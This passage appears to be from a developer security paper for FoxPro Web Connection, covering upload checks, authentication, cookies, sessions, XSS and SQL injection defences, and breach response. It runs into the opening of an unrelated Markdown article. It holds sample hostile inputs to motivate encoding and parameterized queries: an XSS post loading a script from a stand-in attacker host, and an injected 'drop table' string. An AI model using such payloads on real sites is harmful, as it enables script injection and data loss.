On the client use the accept attribute and specify a mime type or mime type wildcard:

<input type="file" id="upload" name="upload"
       multiple accept="image/*" />

On the Web Connection server you can explicitly check the file names and extract the extensions to check:

*** Use GetMultiPartFiles() to retrieve file content and file names
loFiles = Request.GetMultiPartFiles("Upload")

FOR EACH loFile IN loFiles
	lcExt = LOWER(JUSTEXT(loFile.FileName))
	IF !INLIST(lcExt,"jpg","png","jpeg","gif")
	   THIS.StandardPage("Upload Error","Only image files are allowed for upload.")
	   RETURN
	ENDIF
	IF LEN(loFile.Content) > 1500000
	   THIS.StandardPage("File upload refused",;
	                     "Files over 1.5meg are not allowed for this sample...<br/>" + ;
	                     "File: " + loFile.FileName)
	   RETURN
	ENDIF
	...
ENDFOR

Never allow uploads to upload 'just anything' - always limit the supported file types to specific content types. The most common things that are uploaded are images, pdfs, and Zip files. Zip files are relatively safe since they can't be executed as is.

Never Store Executable or Script Code in Web Accessible Folders

If you allow people to upload executable code (you never should - but if you for some crazy reason do) don't allow that content to be accessible from anywhere in your Web site.

Require a Login for Uploads

Any site that allows random file uploads should always require logins so that at the very least the user had to register at some point and there's at least a minimal audit trail. Just having a login will dissuade a huge number of generic attacks, because without a compromised account Web site scanners can't even probe random POST and Upload links on a site. Authentication is a quick and easy way to remove a bunch of malicious activity.

This holds true for most POST/PUT operations in general. Read only content is rarely a hacking target, but any operation that involves writing data has the potential to attract bad operators.

Most applications can easily justify an account requirement for data updates.
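Tying this together with the earlier upload example, here's a minimal sketch of an upload handler that requires a login first (the UploadImage method name is hypothetical):

FUNCTION UploadImage()

*** Require an authenticated user before accepting any content
IF !THIS.Authenticate("ANY")
   RETURN   && Login form displays automatically
ENDIF

loFiles = Request.GetMultiPartFiles("Upload")
*** ... validate extensions and size as shown earlier ...

ENDFUNC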

System Security Summary

So far I've primarily talked about System Security that's not very specific to Web Connection. System security is vitally important for setting up and configuring your system and getting it ready to host an application.

Windows and IIS have gotten pretty good over the years at drastically reducing the attack surface for hacking by minimizing what features are enabled by default and forcing Administrators to explicitly enable what they need. The Web Connection configuration tools help with this considerably in ensuring that your application is reasonably well configured right out of the gate, but you should still review the base settings.

The most important thing to always consider is the application Identity discussed earlier and applying that identity selectively. Next we'll look at application security which arguably is even more important and more relevant to developers.

Protecting your Application

System security is the underlying security issue that you need to avoid, but application security is usually the entry point for potential hacking attempts. Before system security can be compromised, 99% of the time the application has to be compromised first to even allow access to system security features.

There are a number of different aspects to this. At a high level there's authentication and access level security of an application that's responsible for making sure only the appropriate user can see the data that he or she has access to. Failing on this end can cause data breaches where data can be accessed in unauthorized ways.

The other issue is potential holes in the application's security that might allow the application itself to be hijacked. Maybe it's possible to somehow execute code that can then jump into the system security issues that I discussed in the last section. Remote execution hacks are among the most critical and something that any application that uses dynamic code or scripts potentially has to worry about.

Finally there's also JavaScript exploits, mostly in the form of Cross Site Scripting (XSS) attacks that can compromise user data as users interact with the application. XSS attacks are based on malicious JavaScript code that has made its way into an application and then executes to send sensitive data off to another server.

Web Authentication in Web Connection

Authentication is the process of logging users in and mapping them to a user account. Web Connection supports authentication in two ways.

  • Windows or Basic Authentication against Windows Accounts
    This is a quick and dirty way for authentication where you don't have to set anything up and it just works. This uses Windows accounts, but it's really appropriate only for internal network applications or for securing say an Admin area of a Web site. It's not really appropriate for general public authentication because it requires Windows accounts that have to be configured which is not very practical.

  • User Security Authentication
    This mechanism is implemented using a FoxPro class and is based around a single cookie and a matching session record for each authenticated user. This mechanism uses a class with a few simple authentication methods and stores user data in a FoxPro table. The class is meant to be overridden by applications to add custom features or store data in some other storage like SQL Server.

Authentication is managed by the wwProcess class which has a handful of methods to authenticate users and customize the login process.

The two mechanisms can be used interchangeably by specifying the mechanism in the Process class:

*** Authentication mode: Basic or UserSecurity
cAuthenticationMode = "UserSecurity"

It should be noted that Basic will also work with Windows Authentication if enabled on the Web server - it basically looks at IIS login information rather than the Session info UserSecurity uses.

Don't use Basic for application level Security

Basic and Windows Auth are useful for internal apps or little one-off applications that you build for yourself, but for public facing sites managing users with Windows authentication is terrible. You also have very little control over the login process and you get an ugly pop up window that is not application styled. For the rest of this section we'll talk about UserSecurity Authentication only.

Forcing a LogIn

Authentication is meant to protect access to a Web Connection request or part thereof. If you want to make sure a user is authenticated, you can use the Authenticate() method to check whether the user is authenticated and if not pop up an authentication form:

FUNCTION MyProcessMethod()

*** Checks if logged in
*** If not, an Auth dialog displays
IF !THIS.Authenticate("ANY")
   RETURN   && Just exit processing
ENDIF

THIS.StandardPage("Hello World",;
                  "You're logged in as " + this.cAuthenticatedUser)

ENDFUNC

If a user hits this request an auth dialog pops up automatically. For Basic/Windows auth a system dialog pops up. For UserSecurity an HTML form pops up.

Here's the default UserSecurity login form:

Figure 10 - A UserSecurity Authentication request

By default the login form is driven by a template in ~/Views/_login.wcs which you can customize as you see fit. The template contains a link to the main _layout.wcs page which provides the page chrome.

Very basic out of Box UI Features

The thing to understand about the built in authentication UI features is that they are very basic. They allow you to force a login, but there's no built-in mechanism for creating a new account, recovering a password or anything else related to account management. The form in Figure 10 basically just provides a login against a FoxPro table (or your own subclass which can do whatever it needs). I'll discuss how to build that part of the functionality a little later on.

User Security Authentication

User security is handled by a base class called wwUserSecurity which provides simple user authentication and basic CRUD operations for adding, editing, deleting and looking up users.

The most important method is the wwUserSecurity.Authenticate() method which is used to actually validate a username and password by looking it up in the UserSecurity.dbf table by default. The method checks for active status, account expiration and optionally manages looking up an encrypted password.

User Security works by using a Cookie and Web Connection's Session object to track a user, and it uses the wwProcess class to expose the relevant user information as properties. You can use properties like Process.lIsAuthenticated to check whether the user is authenticated, or Process.cAuthenticatedUser and Process.cAuthenticatedName for the user id and user name respectively. You can also access Process.oUserSecurity.oUser to get access to all of the user data that's stored in the user table if authenticated.

Because UserSecurity relies on a Cookie and Session State to track the user, you have to turn on Session usage in OnProcessInit():

FUNCTION OnProcessInit
...
InitSession("myApp")
...
ENDFUNC

Extending UserSecurity

The UserSecurity class is very simple and very generic and is meant to be used as a base class that you subclass from. At the very least I recommend you create a subclass for every application and change the table name to something specific to your application.

DEFINE CLASS TT_Users AS wwUserSecurity

calias = "tt_users"
cfilename = "tt_users"

ENDDEFINE

This now uses the users table as tt_users.dbf instead of UserSecurity.dbf. Why do this? It'll make it very clear what's stored in the user table, but it also avoids conflicts with other applications or even the Web Connection sample which also uses a UserSecurity table of its own.

The most common thing you'll do in a wwUserSecurity subclass is to override the Authenticate method. If you need to authenticate against a table in your application, or maybe some other object service like ActiveDirectory, you can do that by simply overriding the Authenticate() method. It takes a username and password and you can customize your 'business logic' here to provide custom authentication.

DEFINE CLASS TT_Users AS wwUserSecurity

FUNCTION Authenticate(lcUsername, lcPassword)

*** Custom lookup - SomeOtherLookupRoutine() stands in for
*** your own business logic (SQL Server, Active Directory etc.)
llResult = SomeOtherLookupRoutine(lcUsername, lcPassword)

RETURN llResult
ENDFUNC

ENDDEFINE

You can of course also override any of the other methods in the class, so it's possible to for example change wwUserSecurity to use SQL Server or MongoDb as a data store.

Overriding the Web Connection Authentication Processing

Above I've described overriding business logic which is the core of data access. In addition to that you can also override the Web application flow. You can:

Override the Authentication Rendering

You can use the OnShowAuthenticationForm() method to provide custom rendering. This might be as simple as pointing at a different template, or writing code to completely customize the login UI.

In your wwProcess subclass:

FUNCTION OnShowAuthenticationForm(lcUserName, lcErrorMsg)
Response.ExpandScript("~\views\MyGreatlogin.wcs")
ENDFUNC

Override the User Authorization Process

The most common thing people will want to do is to override the authentication itself. As mentioned you can do this also by overriding wwUserSecurity.Authenticate() but you can also do it in the process class.

This is the default implementation, and realistically you can replace this code with your own that returns .T. or .F.

For example, on my MessageBoard I use a separate user table to login users so I completely replace the Process.OnAuthenticateUser() method:

FUNCTION OnAuthenticateUser(lcEmail, lcPassword, lcErrorMsg)

*** THIS IS THE DEFAULT IMPLEMENTATION 
*** To override behavior override this method
IF EMPTY(lcEmail)
   lcEmail = ""
ENDIF 
IF EMPTY(lcPassword)
   lcPassword = ""
ENDIF

loUserBus = CREATEOBJECT("wwt_user")

*** Default implementation is not case sensitive
IF !loUserBus.AuthenticateAndLoad(LOWER(lcEmail),lcPassword)
	*** Set lcErrorMsg to pass back via REF parm
	lcErrorMsg = loUserBus.cErrorMsg
	RETURN .F.
ENDIF	

*** Assign the user
this.cAuthenticatedUser = lcEmail && email
this.cAuthenticatedName = TRIM(loUserBus.oData.Name)

*** Add a custom sessionvar we can pick up on each request
Session.SetSessionVar("_authenticatedUserId",loUserBus.oData.CookieId)
Session.SetSessionVar("_authenticatedName",TRIM(loUserBus.oData.Name))
Session.SetSessionVar("_authenticatedAdmin",IIF(loUserBus.oData.Admin != 0,"True",""))

RETURN .T.
ENDFUNC

In this case I'm setting some custom Session vars that pull relevant information that my UI needs out of the session table. This is quicker than a user look up each time and these values are simply 'cached' once a user is logged in.

Override behavior when User is Validated

You may also want to know whether a user is authenticated or not and, if so, perform some additional actions. For example, in many applications it's useful to set some additional, easily accessible properties that provide more info on the user - such as the user name or an email address - that are not stored by default.

In that same application I set a few variables on the Process class to ensure I can easily embed information into a login form.

FUNCTION OnAuthenticated()

LOCAL loUser as wwt_user, loData
loUser = CREATEOBJECT("wwt_user")
IF loUser.LoadFromEmail(this.cAuthenticatedUser)
   this.oUser = loUser
   loData = loUser.oData
   loData.LastOn = DATETIME()
   this.oUser.Save()   

   this.cAuthenticatedName = TRIM(loData.Name)
   this.cAuthenticatedUserId = TRIM(loData.CookieId)
   this.lAuthenticatedAdmin = IIF(loData.Admin # 0,.t.,.f.)
ELSE
	*** get our custom properties from Session
	this.cAuthenticatedName = Session.GetSessionVar("_authenticatedName")
	this.cAuthenticatedUserId = Session.GetSessionVar("_authenticatedUserId")
	this.lAuthenticatedAdmin = !EMPTY(Session.GetSessionVar("_authenticatedAdmin"))
ENDIF

ENDFUNC
Overriding Process.Authenticate()

The above methods all are low level functions that are called by the Authenticate() method which acts as a coordinator for various sub-behaviors. If you want to do something really custom for your authentication you can completely override the Authenticate() method altogether.

All of these functions have default implementations and if you do subclass them I recommend you copy the existing method and modify it to fit your needs. You'll be able to see how the base features work and what values they expect as input and what to send as results.

A custom User Security Manager

Please take a look at the separate User Security Manager solution we provide.

Cookies and Sessions

Most applications need to track something about the user after the user has logged in. At minimum you need to track the user's user ID so you can identify the user on the next request. The typical way this is done is by using HTTP Cookies which is a small bit of text that is stored in the browser's internal state storage and that is sent to the server with every request while the cookie is not expired.

Cookies should be used very sparingly and in general you should not store data in cookies, but rather identifiers that link back to content that is identifiable on the server. Cookies are often used in conjunction with server side Session State that provides for the actual 'data' stored that is related to the user cookie.

The idea is that cookies are references to data that the server needs in order to identify a user and provide common default functionality. For example, you need to track a logged in user so that you can display the account information for that specific user after the user has logged in. If it weren't for cookies, that identifying id would have to be passed explicitly on every request via the URL query string or form buffer. So to make this easier browsers provide a Cookie interface.

Cookies are set by the server and persisted by the client and sent to the server on any subsequent server request.

You can look at the cookies you are using in any of the browser DevTools:

Notice that most of the values stored there are single value identifiers. Also note that there can be many cookies - most of the cookies shown are actually 3rd party cookies (from Google Analytics and AdWords specifically).

Cookies are tied to a specific domain and have an expiration date if specified. By default Cookies persist for the duration of the browser session - shutting down the browser kills the Cookie. You can explicitly set an expiration date though, and the cookie then persists until that date in that browser.

You can create cookies in Web Connection with the Response.AddCookie() function:

Response.AddCookie("wwmsgbrd",loUser.Id,"/",Date() + 5,.t.,.t.)

You pass:

  • A cookie name
  • A string value
  • A path: this defaults to the root of the site
    (you should never use a different value for this!)
  • An optional expiration date (or .F.)
  • HttpOnly Cookie
  • Secure HTTPS based Cookie only

The llHttpOnly flag specifies that the cookie cannot be accessed from client script code, meaning it's not JavaScript hackable. It's a good idea to always use this feature unless you explicitly need the cookie to be accessed in JavaScript, which should be very rare.

The llHttpsOnly flag makes it so that the cookie is not set or sent when requests are not running over HTTPS, which prevents potential hijacking of cookies in man-in-the-middle attacks. If you run your site only over HTTPS it's a good idea to enable this flag.

Although it's tempting to never expire cookies when persisting them, it's generally not a good idea to use long expiration times. Instead keep the expiration times to a few days max and allow for refreshing the cookie when a user comes back. Web Connection Session state automatically does rolling renewals as you access a site for persisted cookies.

Session Storage - Server Side State

Related to Cookies are Sessions, which store the active user's state on the server in a table. Cookies are meant to just hold identifiers, and a common use case for cookies is a Session Id that maps the cookie to a Session id on the server.

Web Connection's Session object

Web Connection's wwSession Class uses a single cookie to link a Session table to a client side cookie. So rather than having a bunch of cookies on the client that hold information like Username, last on, and other info, that data can be stored on the server and read by the server side application. This is good because it doesn't make any of this potentially sensitive information available in the browser in a persistent fashion where it might be compromised. Instead Sessions store the key value pairs in a table on the server.

Sessions are easy to use but they do have to be enabled explicitly. To do that you call Process.InitSession() - typically in Process::OnProcessInit():

FUNCTION OnProcessInit

*** all parms are optional
*** wwDemo Cookie, 30 minute timeout, 
*** don't persist cookie across browser sessions
THIS.InitSession("wwDemo",1800,.F.)
...
RETURN

If you're using wwUserSecurity authentication as described earlier, Session state is automatically enabled in its default mode. I still recommend you explicitly configure Sessions as shown above for more control over how Sessions are configured.

Once sessions have been set up you can set and read Session variables using Session.SetSessionVar() and Session.GetSessionVar():

FUNCTION YourProcessMethod

lcSessionVar = Session.GetSessionVar("MyVar")
IF EMPTY(lcSessionVar)
   *** Not set
   Session.SetSessionVar("MyVar","Hello from a session. Created at: " + TIME())
   lcSessionVar = Session.GetSessionVar("MyVar")
ENDIF

THIS.StandardPage("Session Demo","Session value: " + lcSessionVar)
RETURN
What to use Session for

Common application related things to store in Session storage are:

  • User name
  • Email address (for Gravatar links for example)
  • Last access date for features
  • Simple preferences
  • anything that needs to persist and doesn't fit a typical business object

The advantage of Session storage is that it's often quicker to retrieve Session data than to pull that same data out of one or more business objects. Session values are good for values that are user specific but don't fit into user specific business objects - usually operational values that have to do with preferences and site settings.

Although you can use Sessions to store this kind of data, there's no requirement to do so. You might also directly access a user table and user record that holds similar information in the more strongly typed format of a class with properties. But that's up to you.

It's important to make sure Sessions and Cookies don't persist forever. It's good to allow keeping them alive with an explicit Remember Me option, but make sure that you don't expire the cookies too far in the future. While the cookie or session is valid it's possible to just walk into a site, and you don't want unauthorized access from accidental physical access or, worse, a physically compromised machine.

If you need to persist cookies/sessions keep it to a few days max and rely on rolling updates instead. Rolling updates refresh the cookie after each use and push the expiration out for another timeout period. wwSession does this automatically, so there should never be a reason for really long session timeouts. For 'persistent' sessions a few days - say 5 - is probably a good call. If a user visits that infrequently it's probably Ok to force a new login, but a frequent user who accesses the site every day will appreciate not having to log in each time.

Locking Down Web Connection

There are two areas of concern when it comes to locking down Web Connection:

  • Your Application
  • Web Connection Administration Tools

Application

A Web Connection application is yours to manage, and the wwUserSecurity and wwProcess security I discussed in the last section is what's needed to lock down your application.

You can block access to individual requests using Authenticate(), or if you want to be more granular you can look at the Process.oUserSecurity object for more specific rules to display or hide fields and other features.

How any of this works, depends entirely on the requirements of the application.

Web Connection Admin Security

For the administration end of things there are two things that need to be locked down:

  • The admin/Admin.aspx Page
  • Web Connection .NET or ISAPI Handler Administration

These two pages contain very sensitive operations that let you change the application's system behavior and that can take down your site.

For this reason it's very important to make sure these pages are not publicly accessible.

Start by removing IUSR_ rights from the admin folder in your Web Connection site. This disallows anonymous access and essentially forces a login to any physical pages in that folder.

Next make sure that the AdminAccount key in web.config or wc.ini is not empty. This account is used to protect the Handler admin page and if it is not set the page is openly accessible. By default this value is set to ANY, which means any authenticated user can access the page, but it's better to apply a specific account or a comma delimited list of accounts that can access the page.
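In web.config the key lives in the Web Connection handler configuration section and looks something like this - a sketch, where the account name is a hypothetical example:

<webConnectionConfiguration>
  <!-- restrict the module administration page to a specific account -->
  <add key="AdminAccount" value="rickadmin" />
</webConnectionConfiguration>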

Script Attacks

One common attack vector for hackers is to attack scripts and dynamic code generation by 'injecting' malicious code via user input. Any site that takes user input has to be very aware of how that input might be displayed later.

Always be wary of data that is entered and then displayed back to users. There are a number of different attacks but the most popular even to this day are:

  • Cross Site Scripting (XSS) Attacks
  • Sql Injection Attacks

Cross Site Scripting (XSS) Attacks

Cross site scripting gets its name from the idea that almost any code that manages to get injected into a page, ends up sending data to another site, thereby stealing potentially sensitive data.

What is XSS?

XSS works through user input, injecting script code into the input in hopes that the site operator doesn't properly sanitize it. The problem with input is that if you simply echo back raw HTML tags as is, without sanitizing them, these HTML tags will render as - well, HTML. HTML also has support for script execution in a number of ways, and if a black hat can plant a bit of script code into user input that is then displayed to all users - somebody just won at XSS Bingo!

So say you are running a message board like I do and you take raw user input. Let's say I allow users to type plain text or markdown. Now our Fred Hacker comes along and types this into my simple <textarea>:

Hey, 

Cool Site.

<script>alert('gotcha!')</script> <script src="https://gotcha.com/evilMindedWizard.js"></script>

Like what you've done here. Come check out 
<a href="javascript: alert('gotcha')>my site</a><div style="padding: 20px;opacity: 0" onmouseover="alert('mouse gotcha');"></div>

If I capture that content with Request.Form() then write it to a database, then later display it to my users as is like this:

<%= poMessage.Message %>

I'll be in for a rude awakening. Now every time the page with this message loads for other users browsing the site, they see alert boxes popping up. And of course that's pretty benign - more likely a large block of code would be used to hijack browser cookies and potentially other sensitive content on the page and send it to another site.

I'll end up with script code executing those first two scripts when the page loads, the javascript: code when I click the link, and the mouse hover code when I hover over the invisible <div> area. Not cool!

HTML Encoding

Luckily it's fairly easy to mitigate script embedding by ensuring that content is HTML Encoded. So rather than writing the message out in raw form I can write it out as:

<%= EncodeHtml(poMessage.Message) %>

or

<%: poMessage.Message %>

Both encode the message text, which effectively replaces the < and > tags with HTML entities so they aren't executed as script. Note that the <%: %> syntax is relatively new and does exactly the same thing as the command above.
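To make the mechanics concrete, here's a highly simplified sketch of what HTML encoding does. The real EncodeHtml() in Web Connection handles more cases, so treat this purely as an illustration:

*** Simplified illustration of HTML encoding
FUNCTION HtmlEncodeSketch(lcText)
lcText = STRTRAN(lcText, "&", "&amp;")    && ampersands first
lcText = STRTRAN(lcText, "<", "&lt;")
lcText = STRTRAN(lcText, ">", "&gt;")
lcText = STRTRAN(lcText, ["], "&quot;")
RETURN lcText
ENDFUNC

*** <script> becomes &lt;script&gt; and renders as plain text
? HtmlEncodeSketch([<script>alert('gotcha!')</script>])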

HTML Sanitation

Another option is to clean up user input by sanitizing it and removing script capable code rather than HTML encoding. This might be necessary if you're capturing user input as Markdown for example, and then echo the result back which might include embedded HTML - including script tags. Html Encoding this content wouldn't work because it would encode the potentially desired embedded HTML text.

So rather than HtmlEncoding I can call the new SanitizeHtml() function (in wwutils.prg which calls into wwDotnetBridge) which essentially strips script tags, iframes, forms and a few other elements, javascript: directives and onXXX events from elements.

This:

<%: SanitizeHtml(poMessage.Message) %>

allows for HTML in the content, but strips anything that can potentially run as script.

SQL Injection

SQL Injection has been around for as long as there has been a SQL language and while SQL Injection has received a lot of bad publicity over the years there's still a lot of Web traffic that tries to exploit SQL injection attacks via URLs or user input.

SQL Injection works on the assumption that user input is passed directly from the query string or form variable input into a manually built SQL string, with the user provided values embedded as literal text.

Never, ever build literal strings for SQL code:

lcSql = [select * from Messages where id = '] + lcId + [']

The problem with the above code is that somebody could pass:

"123';drop table Messages;set x = '1111"

The command would end up as:

select * from Messages where id = '123';drop table Messages; set x = '111'

If you pass that string to a SQL server it's not going to be a happy day. An attacker would have to know something about the table structure and the type of database used, but there are many ways to probe for that - it's easy to do damage with this kind of code.

Don't ever embed raw user input into string based SQL statements. Never, ever!

The simple solution is to use named parameters or variables:

*** SQL passthrough: ?lcId is bound as a parameter
lcSql = [select * from Messages where id = ?lcId]

*** FoxPro local SQL: variables can be referenced directly
lcSql2 = [select * from Messages where id = lcId]

Note that this is mostly a problem if you are executing SQL backend commands. FoxPro data tends to be accessed directly with variables so this is less of an issue with Fox data, but if you're using a SQL Server or MySql or any other SQL backend this is important.
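For SQL passthrough the parameterized version looks like this - a minimal sketch with a hypothetical connection string and table:

*** Hostile input is harmless when passed as a parameter
lcId = "123';drop table Messages;set x = '1111"

lnHandle = SQLSTRINGCONNECT("driver={SQL Server};server=.;database=MyApp;trusted_connection=yes")
IF lnHandle > 0
   *** ?lcId is bound as a parameter - never concatenated into the SQL string
   SQLEXEC(lnHandle, "select * from Messages where id = ?lcId", "TQuery")
   SQLDISCONNECT(lnHandle)
ENDIF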

Checking for Hacks

If you suspect you've been hacked, how do you know?

The best way to check is by going into the logs, and there are two key logs you can go to:

  • IIS Request Logs
    The IIS log records every single request to the Web Server and as you might expect this log can be ginormous. Every page, image, css, script etc. is logged and these log files can be really unwieldy to work with.

To make things a little bit easier you might look at a log parsing tool like Log Parser Lizard GUI which allows you to query logs using a SQL like language. It's very powerful and beats the hell out of manually digging through logs. This tool is a front end to Microsoft LogParser and it works not just with IIS logs but with various other Windows log files like the Event log, for example.

Attacks usually start with probing your server to find vulnerabilities, so looking through the logs for errors is usually a good start to see patterns that hackers are using to attack your site. It's useful to set up monitoring to get notified of errors. This can be annoying, but it can be a life saver if there ever is a problem and you see it in the making rather than in the rear view mirror.

Responding to Getting Hacked

So it's happened. You got hacked. Somebody got in and you lost some data. Now what?

If you know you got compromised, the first step is to try and find out if the breach is still happening and to make sure the problem isn't ongoing. There's nothing worse than compromising information and continuing to leak it. This may not be easy to figure out, but if you are not sure it's best to shut down your site until you can work out what's happened.

It's better to be down, than continuing to leak

If your servers were compromised and system access was obtained from the outside, the only sensible solution at that point is to spin up a new machine and move your data over to it. Once system level access has been compromised there's really no good way to ensure that there isn't some bit of malware still on the system that might be telegraphing out data.

If your data was corrupted that might be worse because you can't just pack up and start over. Your only option in that case is to go back to a previous backup.

That brings up an important point:

Back up your Data!

Have a backup strategy that lets you get your data back to a sensible point in time. Make sure you have rolling backups that provide you multiple time staggered sets of backups in case recent backups have also been corrupted.

Disclose

If your data got hacked and you leaked sensitive data, you are required to report the incident to the authorities and to the affected parties. Not only is it required by law but it's also common decency so that those affected can take potential action to prevent further damage from the compromised data.

It may not always be possible to ascertain exactly what data was leaked, so disclosure has to be made to every potentially affected customer. It's certainly a bad step to have to take, and sure to piss your customers off, but it's a thousand times worse if you hide the knowledge and it comes out later through an investigation or a whistle blower. It's way better to get out in front of it right when it happens than trying to draw out the pain.

Think about how often we have heard about data breaches in the news and think about which companies make the best impression when this happens - it's those that come out right away, admit their failure and describe what they are doing to mitigate it. Compare that to the dead beats that hide it, are found out and eventually get slapped with a heavy fine. Which company do you think is more likely to bounce back from a data breach?

Closing

Let's hope a breach or system compromise never happens, but it's always a possibility. I write this bit here at the very end of this long paper in hopes that it will scare you into treating security not as an afterthought, but as an integral part of the application building process. Security is something that's much easier to build in from the beginning than to bolt on at the end.

If you have mission critical applications, especially those that hold sensitive or valuable data, make sure you take security very seriously. Security is a very complex and large field, and if you as a developer feel overwhelmed you're not alone. If you don't know or feel you don't understand all the issues, it's a good idea to bring in outside help for security consulting, or even hire an internal person whose responsibility it is to audit the hardware, network and application to ensure (as much as is possible) that security protocols are followed.

Let's make sure that hackers don't have an easy time getting into your site...

Summary

Security is a complex topic and there's much more to it than what I describe here. What I've focused on in this document are the most common and also Web Connection centric issues that you need to worry about, that are geared to the typical developer who needs to manage his or her own application without the support of a dedicated IT department.

If you are dealing with highly sensitive data, you will no doubt be required to have your software audited and will likely have to rely on security experts to help with that process. Even if not, it's often a good idea to bring in a security specialist to work with you through threat analysis to find and address any security issues. No amount of generic tooling or setting of configuration options is an automatic guarantee that your application is secure - it takes forethought and testing to ensure that both the operating environment and the application itself are secure.

I hope this article has at minimum given you a good starting point on what to look for and make your apps more secure...

Resources

this post was created and published with Markdown Monster

Marking up the World with Markdown and FoxPro

$
0
0

prepared for:Southwest Fox 2018
October 1st, 2018

Markdown has easily been one of the most influential technologies that have affected me in the last few years. Specifically it has changed how I work with documentation and a number of documents both for writing and also for text editing and content storage inside of applications.

Markdown is, typically, a plain text representation of HTML. Markdown works using a relatively small set of easy to type markup mnemonics to represent many common document centric HTML elements like bold, italic, underlined text, ordered and unordered lists, links and images, code snippets, tables and more. This small set of markup directives is easy to learn and quick to type in any editor without special tools or applications.

In the past I've been firmly planted in the world of rich text editors like Word, or using a WYSIWYG editor on the Web, or for Blog Editing using something like Live Writer which used a WYSIWYG editor for post editing. When I first discovered Markdown a number of years ago, I very quickly realized that rich editors, while they look nice as I type, are mostly a distraction and often end up drastically slowing down my text typing. When I write the most important thing to me is getting my content onto the screen/page as quickly as possible and having a minimal way to do this is more important than seeing the layout transformed as I type. Typing text is oddly freeing, and with most Markdown editors is also much quicker than using a rich editor. I found that Markdown helped me in a number of ways to improve my writing productivity.

Pretty quickly I found myself wishing most or all of my document interaction could be via Markdown. Even today I often find myself typing Markdown into email messages, comments on message boards and even into Word documents where it obviously doesn't work.

For me Markdown was highly addictive. I wanted Markdown in all the places!

Today I write most of my documentation for products and components using Markdown. I write my blog posts using Markdown. The West Wind Message Board uses Markdown for messages that users can post. I enter product information in my online store using - you guessed it - Markdown. This document you're reading now, was written in Markdown as well.

I work on three different documentation tools and they all use Markdown, one with data stored in FoxPro tables, the others with Markdown documents on disk. Heck, I even wrote a popular Markdown editor called Markdown Monster to provide an optimized editing experience - and it turns out I'm not alone in wanting one. Because Markdown is a non-proprietary format, it's easy to enhance with cool support features that I can build myself - after all, it's easy to simply inject text into a text document.

What is Markdown?

I gave a brief paragraph summary of Markdown above. Let me back this up with a more thorough discussion of what Markdown is. Let's start with a quick look at what Markdown looks like here inside of a Markdown editor that provides syntax highlighting for Markdown:

There are of course many more features to Markdown, but this gives you an idea of what Markdown content looks like. You can see that the Markdown contains a number of simple formatting directives, yet the document you are typing is basically text and relatively clean. Even so you are looking at the raw Markdown, which includes all of the formatting information.

And this is one of the big benefits of Markdown: You're working with text using the raw text markup format while at the same time working in a relatively clean document that's easy to type, edit and read. In a nutshell: There's no magic hidden from you with Markdown!

Let's drill into what Markdown is and some of the high-level benefits it offers:

HTML Output Based

Markdown is a plain text format that typically is rendered into HTML. HTML is the most common output target for Markdown. In fact, Markdown is a superset of HTML and you can put raw HTML inside of a Markdown document.

However there are also Markdown parsers that can directly create PDF documents, ePub books, revealJS slides and even WPF Flow Layout documents. How Markdown is parsed and used is really up to the parser that is used to turn Markdown into something that is displayed to the user. Just know that the initial assumption is that the output is HTML. For the purpose of this document we only discuss Markdown as an HTML output renderer.

Although Markdown is effectively a superset of HTML - it supports raw HTML as part of a document - Markdown is not a replacement for HTML content editing in general. Markdown does great with large blocks of text based content such as documentation, reference material, or informational Web site content like About pages, Privacy Policies and the like that are mostly text. Markdown's markup can represent many common writing abstractions like bold text, lists, links, images etc., but the markup itself, outside of raw HTML, doesn't have layout support. IOW, you can't easily add custom styling, additional HTML <div> elements and so on. Markdown is all about text plus a few of the most-used formatting features appropriate for text editing.

Plain Text

One of the greatest features of Markdown is that it's simply plain text. This means you don't need a special editor to edit it. Notepad or even an Editbox in FoxPro or a <textarea> in a Web application is all you need to edit Markdown. It works anywhere!

If you need to edit content and want to create HTML output, Markdown is an easy way to create that HTML output by using a Markdown representation of it as plain text. Markdown is text centric so it's meant primarily for text based documents.

Markdown offers a great way to edit content that needs to display as HTML. But rather than editing HTML tag soup directly, Markdown lets you write mostly plain text with only a few easy to remember markup text "symbols" that signify things like bold and italic text, links, images headers and lists and so on. The beauty of Markdown is that it's very readable and editable as plain text, and yet can still render nice looking HTML content. For editing scenarios it's easy to add a previewer so you can see what you're typing without it getting in the way of your text content.

Markdown makes it easy to represent text centric HTML output as easily typeable, plain text.

Simplicity

Markdown is very easy to get started with, and after learning less than a handful of common Markdown markup commands you can be highly productive. Most of the markup directives feel natural because a number of them have already been in use in old school typesetting solutions for Unix/DOS etc. For the most part content creation is typing plain text with a handful of common markup commands - bold, italic, lists, images, links are the most common - mixed in.

Raw Document Editing

With Markdown you're always editing the raw document. The big benefit is you always see what the markup looks like, because you are editing the raw document, not some rendered version of it. This means if you use a dedicated Markdown editor that embeds tags for you, you can see the raw tags exactly as they are embedded. This makes it easy to learn Markdown, because even if you use editor tooling you immediately see what that tooling does. Once you get familiar, many Markdown 'directives' are quicker to simply type inline than to rely on hotkeys or toolbar selections.

Productivity

Markdown brings big productivity gains due to the simplicity of typing plain text and not having to worry about formatting while writing. To me (and many others) this can't be overstated. I write a lot of large documents, and Markdown's minimalist approach frees my mind from unneeded clutter to focus on the content I'm trying to create.

Edit with any Editor or Textbox

Because Markdown is text, you don't need to use a special tool to edit it - any text editor, even NotePad will do, or if you're using it in an application a simple textbox does the trick in desktop apps or Web apps. It's also easy to enhance this simple interface with simple convenience features and because it's just plain text it's also very easy to build custom tooling that can embed complex text features like special markup, equations or publishing directives directly into the document. This is why there is a lot of Markdown related tooling available.

Easy to Compare and Share

Because Markdown is text it can be easily compared using source control tools like Git. Markdown text is mostly content, unlike HTML, so source code comparisons aren't burdened by things like HTML tags or, worse, binary formats like Word.

Fast Editing

Editing Markdown text tends to be very fast, because you are essentially editing plain text. Editors can be bare bones and don't need to worry about laying out text as you type, slowing down your typing speed. As a result Markdown editors tend to feel very fast and efficient without keyboard lag. Most WYSIWYG solutions are dreadfully slow for typing (the big exception being Word because it uses non-standard keyboard input trapping).

Developer Friendly

If you're writing developer documentation one important aspect is adding syntax colored code snippets. If you've used Word or a tool that uses a WYSIWYG HTML editor you know what a pain it can be for getting properly color coded code into a document.

Markdown has native support for code blocks as part of Markdown syntax which allows you to simply paste code into the document as text and let the Markdown rendering handle how to display the syntax. The generated output for code snippets uses a commonly accepted tag format:

<pre><code class="language-html">
lcId = SYS(2015)</code></pre>

There are a number of JavaScript libraries that understand this syntax formatting and can easily turn this HTML markup into syntax highlighted code. I use highlightJS - more on that later.

Markdown Transformation

